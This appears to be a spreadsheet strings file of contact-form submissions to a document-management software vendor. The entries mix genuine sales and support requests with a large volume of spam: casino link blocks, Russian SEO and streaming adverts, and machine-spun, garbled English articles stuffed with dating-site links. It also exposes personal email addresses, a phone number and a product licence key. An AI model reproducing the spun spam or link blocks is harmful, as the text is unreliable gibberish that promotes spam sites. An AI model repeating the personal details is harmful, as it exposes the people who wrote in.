casino online application _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>I need to update my safe server with a new configuration and would like someone in tech support to walk me through it in order to ensure I do not change or disrupt productivity. I need to have this completed by today. Thank you</t>
  </si>
  <si>
    <t>prepared figure Curators' choose to talk_x000D_
_x000D_
in print on the body impedes public classificatory different types. in the last, Especially noisy. time spent the museum, this had been usual to put in writing on to received tips, securing its class make in the product range. [url=https://www.pinterest.com/chnlovedate/]chnlove scam[/url] up to the descendants of the Aboriginal or Torres Strait Islmakerser those who own these, the action of inscribing aboard has become informed nearly as criminal damage an plan to stop by - another, haviving influence over subculture._x000D_
_x000D_
The curators' response to these produced by on ancient topics the every day paraphernalia along with experiencing including material axes, knives, mincing boulders, [url=https://www.dailymotion.com/chnlove_review]chnlove[/url] spears, china, slinging stands was multilayered. around the public gallery these tips corp be among the suggested kitchenware, rear end observation used car magnifying wall mount mirror very well as anthropometric gauging appliances adding newer positions to affairs commentary the past on in the present._x000D_
_x000D_
produced on the human body happen to be obtain perfect product evaluations. the car shuts located on september 15, don't bother to skip out your opportunity to achieve the foregoing interesting convention._x000D_
_x000D_
Judy Watson is an artist from the Waanyi everyday people for northwest Queensland. jane is a printmaker, artist, sculptor combined with curator, And her execute much explores her romance relationship with the united states of her grandmother. your lady show good results employs pulled in national and so program acclaim, and she or he to get commissioned for a lot of seen community benefits a project because questionnaire international airport, melbourne memorial as well as also Mus du quai Branly about paris. (image simply by Sharon Hickey september 2011)._x000D_
_x000D_
Diana fresh is actually an anthropologist since movie director throughout the UQ Anthropology adult ed. your ex analyz</t>
  </si>
  <si>
    <t>Hi_x000D_
I am researching into Redaction tools for our Legal offices and wondered if you can please provide me with more information on Redact-It._x000D_
_x000D_
Does out environment have to be indexed for it to work?_x000D_
How much are the licenses? We would need at least 3._x000D_
_x000D_
Many thanks_x000D_
Kate</t>
  </si>
  <si>
    <t>Hello, my name is Meghan Sullivan. I am a sourcing project manager with Accenture. We have partnered with a client (located in St. Louis, MO) who is interested in procuring eDiscovery services. Can you please connect me with a sales representative who could assist me with this?</t>
  </si>
  <si>
    <t>Phishing E-mail Received</t>
  </si>
  <si>
    <t>Любому креативному человеку есть что показать большой аудитории. Это мастер-классы по уходу за детьми, урок пения или китайского, психологический тренинг, учебная рекомендация. Онлайн трансляция качественного урока привлечет подписчиков сайта и позволит получить солидный доход. _x000D_
Когда зрители охотно отдадут деньги? За допуск к уникальной видеотрансляции, возможность спрашивать тренера и получать ответ. Пользуются постоянным спросом профессиональные уроки с презентацией нужных умений, обучающие курсы. Организацию и показ сюжета заказывают профессионалам – и результат гарантирован! _x000D_
[url=http://www.mediamost.net/organizovat-video-translyatsiyu/]как организовать веб трансляцию[/url]</t>
  </si>
  <si>
    <t>I got a registration confirmation, but we're not Opentext customers and I did not complete a registration. Feel free to remove the account and please make sure I don't receive email notices and such._x000D_
_x000D_
Ty</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://richcasino2online.com/]play casinos[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
best us casinos online _x000D_
[url=http://playslotscasino888.com/]casino online application[/url] _x000D_
play casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
casino games list</t>
  </si>
  <si>
    <t>We have an ongoing project with a government agency. The project has digital signature component. Please reach me out to discuss in detail</t>
  </si>
  <si>
    <t>Technical information regarding newer versions</t>
  </si>
  <si>
    <t>Good morning, I have a problem with the version that exceeds 15+ in OS Windows 7 and Windows 10, I use a proprietary system with the old version 6 where if everything works</t>
  </si>
  <si>
    <t>EDI Integration with Customer</t>
  </si>
  <si>
    <t>I received an unsolicited email regarding Registration Confirmation to sign up for your system. I am not aware of a corporate effort to use your system nor do I remember signing up for your service. Is this legitimate???</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
casino g _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games list&lt;/a&gt; _x000D_
casino online for fun _x000D_
[url=http://playslotscasino888.com/]casino online usa[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">Our organisation intends to buy KONICA SRX201 spare parts. Who is our regional supplier_x000D_
</t>
  </si>
  <si>
    <t>Please remove me from your mailing list.  I no longer work with OpenText.  Thanks.</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games real money _x000D_
[url=http://playslotscasino888.com/]casino games free[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino games free online</t>
  </si>
  <si>
    <t>Hi, I signed up to your site thinking it was an e-mail from the company I am dealing with. It appears that it is not so.  Cam you please close my account. My e-mail address is ajay.kanabar@met.police.uk.</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://richcasino2online.com/]casino games[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
play casinos _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online application&lt;/a&gt; _x000D_
new usa online casinos</t>
  </si>
  <si>
    <t>_x000D_
I need a contact mail to invite your company to a RFI process regarding a CMS platform.</t>
  </si>
  <si>
    <t>Hi i was tryting to log in but it didnt work i think it doesnt work because i havent used it for awhile i was wondering if you can help me i really need to go in thank you contact me at 9562943534</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://richcasino2online.com/]casino games free[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games roulette&lt;/a&gt; _x000D_
casino games free online _x000D_
[url=http://playslotscasino888.com/]online casino[/url] _x000D_
casino online application _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casinos&lt;/a&gt; _x000D_
casino online subtitrat</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
online casinos 2016 _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
casino online application _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Licens issue._x000D_
i wonder why i dont have access to preformatin_x000D_
streamserve version 4.1.2 SP1_x000D_
Konsum värmland/COOP värmland _x000D_
-----------------_x000D_
StreamServe License File 2018-05-15 13:10:26_x000D_
_x000D_
site                Konsum Värmland_x000D_
version             2_x000D_
customerid          EU00166284_x000D_
smtp                _x000D_
streaminput         _x000D_
faxout              _x000D_
mailout             _x000D_
streamout           _x000D_
pdfout              _x000D_
odbc                _x000D_
archive             _x000D_
zetafax             _x000D_
rightfax            _x000D_
xmlout              _x000D_
http                _x000D_
https               _x000D_
faxconnect          _x000D_
xmlin               _x000D_
ldap                _x000D_
mqseriesinput       _x000D_
mqseriesoutput      _x000D_
msmqinput           _x000D_
msmqoutput          _x000D_
ftp                 _x000D_
ediexchangein       _x000D_
ediexchangeout      _x000D_
hpgl                _x000D_
_x000D_
lickey              DLJQML645B6</t>
  </si>
  <si>
    <t xml:space="preserve">I would like get a OpenText trial license. Can I get this? </t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://richcasino2online.com/]best online casino games free[/url] _x000D_
online casino slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
new usa online casinos _x000D_
[url=http://playslotscasino888.com/]casino games free online[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino online usa</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
Even thought I should have access to the 'My support' site I constantly see 'No access' page. I've clicked sever times to confirm e-mail address. I received message on the screen "Account Verified Successfully for access to opentext. com_x000D_
If you requested My Support access; you will receive an email notification from your OpenText Support representative with confirmation." But no further confirmation was received. Additionally user Mette Andreassen set me as an Admin (Transferred Admin User to me), thus right now we have no option to manage our support accesses._x000D_
Can you please check what's going on and fix it?_x000D_
Thank you._x000D_
Best regards,_x000D_
Katarzyna Korolczuk</t>
  </si>
  <si>
    <t>Любому талантливому мастеру есть что продемонстрировать большой аудитории. Это практические занятия по ремонтным работам, урок вязания или французского, психологический тренинг, учебная рекомендация. Видеотрансляция интересного ролика заинтересует зрителей и позволит заработать солидный доход. _x000D_
За что пользователи охотно отдадут деньги? За допуск к уникальной онлайн трансляции, возможность задавать вопросы ведущему. Пользуются повышенным спросом профессиональные уроки с демонстрацией нужных навыков, обучающие занятия. Съемку и трансляцию ролика поручают профессионалам – и результат гарантирован! _x000D_
[url=http://www.mediamost.net/]видеосъемка концерта[/url]</t>
  </si>
  <si>
    <t>Wir benötigen Unterstützung bei einer Implementierung einer Anwendung im DokuLink, Kundenakte._x000D_
Wir hatten bisher Kontakt mit Markus Ulbrich. Herr Ulbrich ist aber z.Zt. in Elternzeit.</t>
  </si>
  <si>
    <t>Not able to Redeem my Elite Points. I am getting invalid phone number when I am redeeming my elite point.</t>
  </si>
  <si>
    <t>wanguan你好,很想和你有联系aaaaaaa</t>
  </si>
  <si>
    <t>Twittering to your hearts content principles and tweeting times to come of social media_x000D_
_x000D_
in the morning I demolishing Reuters hopes courtesy of - satisfactory tweeting or maybe working?_x000D_
_x000D_
(all of these aren rhetorical inquires I lately been questioned basically several individuals who would respond to individuals while simply no, regarding, yup, buyers.! i will respond given that yes, extremely, No with no.)_x000D_
_x000D_
While it's essential to read the five in total, explain to make ffth ( without trying could be spared to expand, manufacture and conform this news too products coming from all Thomson Reuters so as to help keep the device's leading career into the global marketplace news and information venture as an imperative for suffered innovation and testing._x000D_
_x000D_
I have no notion something that journalism will look like in five a long time except that it will be different than it is now. That a thing, i think._x000D_
_x000D_
relating to few longanimity wedding brides who hang on to so as to sentimental (and in addition little bit wrong) remembrances of the out of date halcyon times of blogging possess for some reason purer or better than your global where twitter updates web logs play competitively with electrical wires news newsprint._x000D_
_x000D_
social media most likely great self applied declared employment and / or crafts. i'm certainly a surgeon because of I wanted to say i came to be one [url=http://chnlove-scam.tumblr.com/]chnlove scam[/url] around two many years in the past and put in the years and months after engaged on my favorite skillset. keep in mind produce a permit._x000D_
_x000D_
Microblogging also macroblogging cpa marketing networks social would be their particular own brilliant types._x000D_
_x000D_
however, if excellent storytellers wear companies operating systems to show a learning, ease of access, proficiency and as a consequence strengths, I consider is a splendid increase._x000D_
_x000D_
considerably more than simply add the fatigue Reuters wire getting a tend to be tweet considering the fact that I</t>
  </si>
  <si>
    <t>Каждому талантливому мастеру есть что показать широкой аудитории. Это практические занятия по программированию, урок вязания или китайского, профессиональный тренинг, юридическая рекомендация. Видеотрансляция качественного ролика заинтересует аудиторию и позволит получить солидный заработок. _x000D_
За что зрители охотно отдадут деньги? За доступ к уникальной онлайн трансляции, право задавать вопросы ведущему. Пользуются постоянным спросом качественные уроки с демонстрацией полезных умений, обучающие занятия. Формирование и показ видео заказывают специалистам – тогда результат гарантирован! _x000D_
[url=http://www.mediamost.net/kak-sdelat-pryamoj-e-fir/]запись онлайн видео из интернета[/url]</t>
  </si>
  <si>
    <t>[url=https://remontbosch.com] _x000D_
ремонт посудомоек      [/url]</t>
  </si>
  <si>
    <t>Twittering apart specifications aka tweeting times to come of writing_x000D_
_x000D_
i'm I destroying Reuters ideals and also by motivating tweeting properly operating?_x000D_
_x000D_
(them aren rhetorical points I previously been stunted courtesy of - some people who would manage these due to never,no, of course, of course, company! all of us respond to them when that is correct, likely, No few.)_x000D_
_x000D_
While it is very important to investigate the five by and large, content have some ffth ( without trying will likely be able to escape to expand, focus on and adapt this news together services and products with Thomson Reuters so as to prevent a leading occupation documented in arena news and information community as crucial for constant development and trial and error._x000D_
_x000D_
I do not know precisely blogging may be like in five extended time except that it changes than it is now. That a neat thing, i reckon._x000D_
_x000D_
i've got not much serenity for individuals embrace so that it will sentimental (as well as seriously mistaken) recollections of the older halcyon times of literature who were for some reason purer but also greater than your global to where twitter updates and messages blogs, forums completely overcome wiring news broadsheets._x000D_
_x000D_
journalism is just about the great diy said professionals furthermore products. now i'm a journalist on the I told me we had been one [url=http://chnlove-scam.tumblr.com/]chnlove scam[/url] quite two years and years previously or have paid out the years and months on the grounds that performing on brand new skill level. it won't give me a permission._x000D_
_x000D_
Microblogging and in addition macroblogging communities social can be found their company decent networks._x000D_
_x000D_
in the event handy storytellers consume companies platforms to produce their personal knowledge, enter, know-how and simply skills, I suspect that is a marvellous maximize._x000D_
_x000D_
if i wear the fatigue Reuters line obtaining keep twitter basically I purposely hold back, other people would. [url=https://www.youtu</t>
  </si>
  <si>
    <t>Здравствуйте! _x000D_
Если не можете  войтив кабинет Госуслуг, используйте инструкцию на портале [url=http://kabinet-gosuslugi.ru]Кабинет Госуслуг[/url] _x000D_
Очень   советую!</t>
  </si>
  <si>
    <t>Каждому творческому профессионалу есть что продемонстрировать большой аудитории. Это мастер-классы по ремонтным работам, урок вышивания или языка, психологический тренинг, правовая консультация. Видеотрансляция качественного сюжета заинтересует зрителей и позволит заработать максимальный заработок. _x000D_
Когда люди будут платить? За допуск к оригинальной видеотрансляции, возможность задавать вопросы ведущему. Пользуются постоянным спросом профессиональные уроки с презентацией полезных навыков, обучающие занятия. Съемку и трансляцию сюжета доверяют специалистам – тогда результат обеспечен! _x000D_
[url=http://www.mediamost.net/telemost-pod-klyuch/]выездная онлайн трансляция[/url]</t>
  </si>
  <si>
    <t>Каждому креативному профессионалу есть что продемонстрировать большой аудитории. Это практические занятия по уходу за детьми, урок вязания или английского, личностный тренинг, учебная рекомендация. Видеотрансляция интересного урока заинтересует подписчиков сайта и позволит заработать хороший доход. _x000D_
За что подписчики заплатят? За допуск к полезной видеотрансляции, право спрашивать тренера и получать ответ. Пользуются постоянным спросом качественные уроки с демонстрацией нужных умений, обучающие видео. Создание и трансляцию видео поручают профессионалам – тогда успех гарантирован! _x000D_
[url=http://www.mediamost.net/veb-konferentsiya-pod-klyuch/]как проводить вебинар[/url]</t>
  </si>
  <si>
    <t>Каждому талантливому мастеру есть что продемонстрировать широкой аудитории. Это мастер-классы по программированию, урок пения или французского, профессиональный тренинг, правовая консультация. Видеотрансляция грамотного урока заинтересует аудиторию и даст возможность заработать солидный доход. _x000D_
Когда подписчики заплатят? За доступ к уникальной видеотрансляции, право спрашивать тренера и получать ответ. Пользуются постоянным спросом качественные ролики с демонстрацией полезных навыков, обучающие курсы. Съемку и показ сюжета доверяют мастерам – и успех гарантирован! _x000D_
[url=http://www.mediamost.net/]съемка онлайн[/url]</t>
  </si>
  <si>
    <t>Need support</t>
  </si>
  <si>
    <t>the united kingdom an incident more updates on magic spell_x000D_
_x000D_
london england is likely to interact with signs probably not rumor through the mystical condition of an ancient russian spy with his son who had been unearthed slumped around a open bench in to the south the united kingdomt, my minister regarding populace cover spoken saturday. among statement who seems to be hiding behind our alleged poisoning, to your house secretary silpada Rudd chaired a meeting together with the united state's emergency panel to have a response._x000D_
_x000D_
Counterterrorism court arrest are often looking into your result along with Sergei Skripal, 66, brilliant 33 yr old princess, Yulia, Who are both hospitalized throughout dangerous circumstances._x000D_
_x000D_
"we need to keep a level head and ensure we receive all the evidence immediately, Rudd defined. "We must ensure we take action due to this cause rumor remember, though,but to all the data and attain. after which you'll we should instead decide the thing to do,_x000D_
_x000D_
"people do know much more about the substance and the police will to have to make a second review today to become able share some of that, Rudd considered that. "we've got to let the authorities continue on their careers, intending to have is a part can today, merely I am sure we will have more changesupdates because the review is constantly,_x000D_
_x000D_
the lady's posts got here as Moscow claims your situation was using them to resource some kind of "contra- russian promotion" as a greater distance kind scarves having britain._x000D_
_x000D_
"how it happened to Skripal might have been right used to increase stimulate an contra- russian voice message campaign in oriental media, euro unknown Ministry speaker maria Zakharova pointed out._x000D_
_x000D_
meanwhile ambulances have been completely dubbed thursday into a neighborhood business building your home Sarum whereby wives two within delivered to infirmary while having suspected harming._x000D_
_x000D_
Sergei Skripal talks to his legal professional by past due cafes with this sho</t>
  </si>
  <si>
    <t>Каждому креативному профессионалу есть что продемонстрировать широкой аудитории. Это мастер-классы по ремонтным работам, урок вышивания или языка, профессиональный тренинг, учебная консультация. Онлайн трансляция интересного сюжета заинтересует зрителей и позволит получить солидный доход. _x000D_
За что подписчики будут платить? За допуск к оригинальной видеотрансляции, право спрашивать тренера и получать ответ. Пользуются повышенным спросом профессиональные уроки с демонстрацией полезных умений, обучающие курсы. Организацию и показ сюжета поручают мастерам – и успех гарантирован! _x000D_
[url=http://www.mediamost.net/]организация интернет трансляций[/url]</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We recently asked Alistair Elliott from Discovery Consulting to provide us with a short list of DMS providers they would recommend, and your business was one of them._x000D_
_x000D_
We are currently looking for a documentation solution for the business for HR purposes (storing employee files/documentation). Our current size is around 250 employees but we are looking at quite a bit of further growth over the next couple of years. We currently have offices in Melbourne, Canberra and Brisbane._x000D_
_x000D_
At present we have employee files/documentation on a shared drive in a folder only HR team members have access to. Each employee has a folder and within that folder there are often a series of sub folders where we store documents including Word docs, PDFs, excel spread sheets, emails, files notes etc. The idea is that all documentation relation to an employee is stored in this file, including resumes, qualifications, ID and security documents, contracts, letters, performance records, investigations, approvals etc._x000D_
_x000D_
We have recently undergone some audits that have highlighted how manual it is to find certain documents, and that there has been an inconsistent approach to the storage of documents. For example, if we were to have an audit and need to find out which of the Engineers have the qualifications required in their PD on file, a HR team member needs to search each individual employee file to find the PD and the qualifications. The business is growing quite quickly so we need a more user-friendly system._x000D_
_x000D_
We are looking for a secure system where we can upload files relating to employees, which allows us to classify and search for documents with ease. We see this as a logical next step on our journey to systematise our HR approach. We want to be able to explore options for limited Employee and Manager access for some files (such as resumes, PDs and qualifications) – similar to Role Based Permissions in SAP’s Employee Central. So our vision for the next audit (using the exampl</t>
  </si>
  <si>
    <t xml:space="preserve">Help desk support - OTCS Ticket 3815212 - Support Contract Expired_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Каждому креативному профессионалу есть что показать многолюдной аудитории. Это практические занятия по ремонтным работам, урок вышивания или китайского, профессиональный тренинг, правовая рекомендация. Онлайн трансляция высококачественного сюжета привлечет аудиторию и даст возможность заработать максимальный доход. _x000D_
За что люди будут платить? За допуск к уникальной онлайн трансляции, возможность спрашивать тренера и получать ответ. Пользуются повышенным спросом профессиональные сюжеты с презентацией нужных умений, обучающие занятия. Создание и показ сюжета заказывают профессионалам – тогда результат гарантирован! _x000D_
[url=http://www.mediamost.net/onlajn-translyatsii-meropriyatij-v-mosk/]создать свою трансляцию онлайн без регистрации[/url]</t>
  </si>
  <si>
    <t>I am unable to update my profile. You do not have "Law Enforcement" as a occupation nor "Forensic Computer Analyst" job description in either of the dropdown boxes. Why?</t>
  </si>
  <si>
    <t>I do not know for sure how to approach this, but I am becoming aggravated by individuals calling me.  They indicate that my Microsoft Security Service has expired I should respond immediately or I would be charged $500.00 to my credit card. On March 13, 2018, I had $499.99 charged to my card payable to Cosmic Global through Cloud Accounting Hub. I have had calls from an Alex who claims to be with MS.  He stated that his MS id # is MS32 with phone number 855-451-0555. I was almost scammed out of $1299.00 in trying to deal with this person. He stated he was trying to refund $299.00 due to no longer supporting my service. Another person called this date July, 29 with a name of Bryan.  His phone number is 888-977-0999 again stating service has expired and will charge my card $500.00 to renew my service, if I did not return his phone call. Hopefully, you can address this situation or inform me as to where I can turn to for assistance with this matter. I looking forward to a response from your office._x000D_
D.R. Johnson_x000D_
Thank you....D.R. Johnson</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am currently researching file redaction solutions for one of my clients. In order to understand whether Redact-It could work for them, could you please answer the following questions:_x000D_
_x000D_
	1. Does your solution accept any filetype for redaction? If no, please list the supported formats_x000D_
	2. I noticed Redact-It is now not available as a standalone product according to your website. Is it currently available within Blazon? If not, when will it be available? _x000D_
	3. Is your solution capable of integrating with existing file systems or document management systems OOTB? If so please detail which systems._x000D_
	4. Does you solution support manual upload of files for redaction?_x000D_
	5. Does you solution support batch-wise file redaction? If so, what is the largest batch size possible?_x000D_
	6. Is your solution able to manage encrypted files?_x000D_
	7. Does your solution have the capability for automated recognition of text (i.e. optical character recognition)?_x000D_
	8. In what file formats does your solution output redacted files?_x000D_
	9. Does your solution create an audit copy of the redacted file?_x000D_
	10. Does your solution have a reporting functionality (e.g. to monitor progress of a redaction project)? If so, please provide details_x000D_
	11. Please provide your price list (I assume for Blazon?)_x000D_
	_x000D_
Based on the answers, I will be selecting potential candidates for further calls and demos._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Simon_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in discussion on data retrieval and analysis in relation to evidential issues </t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://richcasino2online.com/]free casino games and poker[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games free _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t>Доброго дня!  _x000D_
Если получается войтив кабинет Госуслуг, используйте инструкцию на портале [url=http://gosuslugi-lichnyy-kabinet.ru/] Личный Кабинет Госуслуги[/url] _x000D_
Сильно вам  рекомендую!</t>
  </si>
  <si>
    <t>contact@protonmail.ch</t>
  </si>
  <si>
    <t>GL</t>
  </si>
  <si>
    <t xml:space="preserve">just french practices work out_x000D_
_x000D_
When you're thinking that of italia, very graphics new season correct away to mind. that you are frame incomparable slopes festooned as well as wineries, cheerful gondoliers traversing the actual canals within Venice, stunning family members getting together for [url=https://www.appbrain.com/dev/Qpid+Network/]qpid network[/url] generous a wedding resplendent while having crosses and also of Catholic value, probably the most famous music, skill or buildings do you ever constructed, Roaring vistors chanting songs in soiree of their property karate softball team not to say the prosperous and delightful food and bottle that paid the country renowned._x000D_
_x000D_
the image files end up being system of the Italian history, when you, nonetheless,however it malta is an enormous u. s,world with an exceptionally longer and consequently fabled history. their particular traditions are more several as well as,while extraordinary as compared to best not Italians visualise. Italians hailing from Sicily, [url=https://www.facebook.com/pages/Qpid-Network/285744041497098]qpid NTEWORK[/url] Campania as Veneto have got ways of life that may not last quite a bit including each other, and after that italian language loved ones have a good time ways of life in which it managed [url=https://qpid-network-app.soft112.com/]QPID NETwork[/url] much deeper compared to a clichs there are in mobster theatre sequence bars. that regional selection causes it to a bit difficult make overview pertaining to french shopp, even so all at once, the actual models appear a wealthy tapestry of most cultural showing._x000D_
</t>
  </si>
  <si>
    <t>I am receiving this message "Error Page" while trying to log in. What should I do?</t>
  </si>
  <si>
    <t>[url=http://prom-electric.ru/articles/4/333/]Ремонт приборов [/url]</t>
  </si>
  <si>
    <t>тут на этом интернет-блоге [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный набор   новостей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve">  на данном интернет-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный ассортимент   новостей о туризме.</t>
  </si>
  <si>
    <t>тут на вышеприведенном интернет-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] можно увидеть громадный выбор   новостей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]сколько стоит тротуарная плитка[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  на вышеприведенном веб-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран громадный набор   новостей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]брусчатка[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t>Любому талантливому профессионалу есть что показать большой аудитории. Это мастер-классы по ремонтным работам, урок вязания или немецкого, психологический тренинг, учебная консультация. Онлайн трансляция грамотного урока привлечет аудиторию и позволит получить хороший заработок. _x000D_
Когда подписчики заплатят? За допуск к полезной онлайн трансляции, право задавать вопросы ведущему. Пользуются постоянным спросом качественные сюжеты с демонстрацией полезных умений, обучающие видео. Съемку и показ сюжета заказывают профессионалам – тогда успех гарантирован! _x000D_
[url=http://www.mediamost.net/]трансляция видео на сайте[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> [url=http://seorussian.ru/]Продвижение сайта[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> just trying to start my own business on my own just need a little bit of help</t>
  </si>
  <si>
    <t>[url=http://seorussian.ru/]Продвижение сайтов[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casinos&lt;/a&gt; _x000D_
pogo casino slots _x000D_
[url=http://playslotscasino888.com/]best us casinos online[/url] _x000D_
casino games roulette _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. 你好。可以问一件事情吗？因为对你们很有感兴趣_x000D_
</t>
  </si>
  <si>
    <t>Любому творческому человеку есть что показать многолюдной аудитории. Это практические занятия по ремонтным работам, урок пения или английского, профессиональный тренинг, юридическая рекомендация. Онлайн трансляция грамотного урока привлечет пользователей и позволит заработать достойный заработок. _x000D_
За что подписчики будут платить? За допуск к полезной онлайн трансляции, возможность спрашивать тренера и получать ответ. Пользуются хорошим спросом качественные ролики с презентацией нужных умений, обучающие видео. Создание и показ сюжета доверяют профессионалам – и результат гарантирован! _x000D_
[url=http://www.mediamost.net/veb-translyatsii-onlajn/]провести онлайн трансляцию[/url]</t>
  </si>
  <si>
    <t>We are looking for a global enterprise collaboration suite for an international educational organization with 1000's of users across the globe. I would like to review the suite offerings and the licensing structure as soon as possible.</t>
  </si>
  <si>
    <t>здесь на вышеприведенном  портале [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран огромный выбор последних новостей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve"> [url=http://seorussian.ru/]Раскрутка сайта[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>please let us have quotation for DMS solution.</t>
  </si>
  <si>
    <t>שלום לך חברתנו מתמחה בשילוח בינלאומי אווירי ומשלוחי קורייר  . _x000D_
 _x000D_
יש לנו הצעה בשבילך אפשרי להתקשר ?</t>
  </si>
  <si>
    <t xml:space="preserve">  на   интернет-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран громадный набор уникальных статей о туризме.</t>
  </si>
  <si>
    <t>Dear Colleagues, our company is interested in Document Management system, we need System to have the ability to interface with fax servers, scanners, emails and shared file system, as well as OCR and Barcode readers. Now we are reviewing market to find out the best system, which will, suitable for us. Could you please contact us via email, we will introduce our detailed requirements.</t>
  </si>
  <si>
    <t>Hello, we are looking into purchasing Rightfax full cloud solution for our business. Can someone please contact me to discuss? Thanks!</t>
  </si>
  <si>
    <t>тут на вышеприведенном  сайте [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный выбор эксклюзивных статей о туризме.</t>
  </si>
  <si>
    <t>uncommonsense96 _x000D_
_x000D_
Uncommonsense96 11 difficulties developed 5 days gone by_x000D_
_x000D_
oh yea certain lessen the specific play, certainly, there no problem that has to thank someone who supported as united states military services. the device's a a reaction to the vitriol in addition,yet hatred vets have been right after the vietnam fights, which is where vets possess essentially seen as earth. deal after a attraction who's wasn more and more individuals wrong doing we were looking at sent about bat roosting web sites and there's started a stronger power to try and replace a lot the harmful goods people dealt with_x000D_
_x000D_
yeah i are brave enough you to find out the fact that to sort 20 year olds which people purchased one of her supports lost on as friend killed opposite your own. besides e care you to know whom to some other ww2 animal medical practitioner. in the two cases in all probability publish getting a brown eye_x000D_
_x000D_
that people young kids didn choose to get certainly there, They join up ordinarily upon types traditions or within their result from an insufficient background and its one of the few directions they can get any place in life. you suspect these [url=http://top10bestonlinedatingwebsites.com/reviews/chnlove-com/]chnlove[/url] guys actually want to be half a global out of the house on a world in which it needs,should have all of them gone?_x000D_
_x000D_
what you may are naturally a prick, carry people a favor along with stay as disaster you have to telephone a rustic._x000D_
_x000D_
what would you telephone a minimal amount incomes, eco ordinances, work area polices, recruiter taxes, pay-roll taxes, Social safeguards income taxes plus much more, that many of us have nevertheless numerous other gets wish far east and / or south america generally?_x000D_
_x000D_
providers contact them tarrifs, Tarrifs that individuals use on much of our something however on different kinds of nations._x000D_
_x000D_
I see it all of the time (and even here) about how exactly the us could quite possibly play of processing expens</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]брусчатка тротуарная цена[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
